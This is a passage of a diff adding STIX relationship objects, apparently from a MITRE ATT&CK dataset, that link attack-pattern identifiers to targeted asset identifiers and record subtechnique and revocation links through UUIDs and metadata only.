"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:07:25.209Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--11864a8d-db9a-488c-826b-b51f9dafb0b8", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--118bc33e-6726-410d-bead-093e779c925b", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--11931db3-c489-4e19-9d37-881e4d04afa9", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--11a82651-4d69-4738-89c6-17d0243cbbb0", + "created": "2023-09-29T17:37:26.536Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:37:26.536Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--11aaccea-9cad-458d-b174-4b16bfa99599", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c9e0c59e-162e-40a4-b8b1-78fab4329ada", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--11b9b676-18ae-462f-bac9-85b21f15360b", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--11d50384-ff46-4ee7-80d6-c23b5131517f", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--11e1ab6c-fa91-40b7-b20f-72841bfd57ea", + "created": "2024-06-26T14:36:08.387Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:36:08.387Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--11f2dfa5-15de-4908-9c5a-96b69a87f4c7", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--11f4e500-2c6e-42d9-9e52-f5c43dbf9102", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--11f5e183-a426-4bcb-9658-e970a52809fc", + "created": "2024-06-27T09:32:09.976Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:32:09.976Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1f9c2bae-b441-4f66-a8af-b65946ee72f2", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--11f8631f-9475-4910-baa6-975eb776798a", + "created": "2022-03-24T19:30:57.194Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-05-24T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--59ff91cd-1430-4075-8563-e6f15f4f9ff5", + "target_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--12043603-b490-41fc-84ed-99e70ca4876c", + "created": "2020-03-13T21:01:23.208Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--dc27c2ec-c5f9-4228-ba57-d67b590bda93", + "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--120dd0fc-85b9-427c-a729-b4bc073ee9dd", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1219d215-df98-4288-8606-26c0a3c0da2b", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--866d0d6d-02c6-42bd-aa2f-02907fdc0969", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--121bcb38-0132-4bda-a9df-0bfc25a6b4a5", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--121c5fd3-dc71-4f45-b6dc-4b20a0bde300", + "created": "2020-02-21T20:56:06.727Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", + "target_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--12366c18-692e-4b8c-b644-581bebd0552b", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1249d18d-810b-4a7d-9047-07da1b396eb2", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--126f9334-8b0c-4948-a495-07e2b5a7744a", + "created": "2020-02-05T20:11:13.145Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--9e80ddfb-ce32-4961-a778-ca6a10cfae72", + "target_ref": "attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1280bf9c-23eb-4446-b89a-e64d6eadc86a", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--128d6cc8-2f62-4876-8b6f-a65929608de7", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--128de3f9-df58-4122-9523-0ac65a6ebf71", + "created": "2023-09-29T17:45:20.237Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:45:20.237Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1295c654-6c22-4741-8b29-f749bc591630", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--129c89d2-4ed1-40e8-94c5-d90a2dde6ab2", + "created": "2024-06-21T14:12:20.269Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.269Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--38eb0c22-6caf-46ce-8869-5964bd735858", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--12b0d445-3f8b-4172-9868-964fee8b01b8", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6add2ab5-2711-4e9d-87c8-7a0be8531530", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--12c08865-b5f1-4e88-b127-9b4a3d316a3e", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--12d6fc4f-bf06-4146-a387-4cb86f0f44a4", + "created": "2023-09-28T21:13:23.057Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:13:23.057Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--12f16afa-e3ec-4d47-b8a6-d576634d22ce", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--12f4acb7-3a92-45bc-b523-65203f1f2392", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--12fdacea-28f7-4113-ae67-0b19e1ab5e36", + "created": "2023-09-28T19:39:58.335Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:39:58.335Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--12ffc0bb-51b3-4e43-9320-ec6eab7d5841", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--13054c68-0fb6-4028-90fe-17eb8099f327", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--13109d12-2822-4842-a0c9-88fecedee506", + "created": "2024-06-21T14:12:20.277Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.277Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1313b6ce-f09b-4747-abd9-0220293d60f3", + "created": "2020-03-09T14:29:52.142Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--13290cf7-a7c7-4987-bcd4-a75fe3175a6e", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--134371ff-218f-4646-bd3c-7bb48c069c9a", + "created": "2024-06-21T14:12:20.277Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.277Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea071aa0-8f17-416f-ab0d-2bab7e79003d", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--134b19da-1012-495d-8c2e-cc86dc6a6223", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + 